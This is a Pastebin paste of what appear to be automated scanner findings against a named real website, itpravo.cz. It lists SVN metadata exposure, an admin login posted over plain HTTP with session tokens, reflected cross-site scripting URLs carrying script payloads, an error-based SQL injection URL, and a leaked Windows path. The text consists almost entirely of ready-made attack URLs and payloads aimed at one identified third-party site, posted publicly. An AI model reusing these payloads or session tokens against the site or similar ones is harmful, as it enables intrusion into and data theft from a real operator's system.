Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- *SVN Disclosure
- URL: http://www.itpravo.cz/aaa/.svn/all-wcprops
- *Password Transmitted Over HTTP
- URL: http://www.itpravo.cz/aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
- Form target action: /aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
- *XSS
- URL: http://www.itpravo.cz/fulltextdisc.shtml?AA_SL_Session=6d8f106740b7ce51e4b9757d038cadb3&nocache=invalidate&sh_itm='"--></style></script><script>alert(0x00031E)</script>&add_disc=1
- URL: http://www.itpravo.cz/diskuze/index.shtml?AA_SL_Session=1669ce4329df803c425018873e69c502&nocache=invalidate&sh_itm='"--></style></script><script>alert(0x00046E)</script>&add_disc=1
- URL: http://www.itpravo.cz/aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
- Parameter Name: username
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0006BC)</script>
- *Permanent XSS
- URL : http://www.itpravo.cz/diskuze/index.shtml?AA_SL_Session=1669ce4329df803c425018873e69c502&nocache=(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))&sh_itm=78c4593979090b9c7fddc1f3e12f9ebc&add_disc=1
- Injection URL: http://www.itpravo.cz/fulltextdisc.shtml?
- *[Possible] Permanent Cross-site Scripting
- http://www.itpravo.cz/diskuze/index.shtml?x=2016147&add_disc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&all_ids=Zobraz v?e&c_0=3&h_0=xcea526e78c88df65d2152898b9bc4a96&sel_ids=Zobraz vybrané
- *[Possible] Internal Path Leakage (Windows)
- C:\DOCUME~1\MARTIN~1\LOCALS~1\Temp\msohtmlclip1\01
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement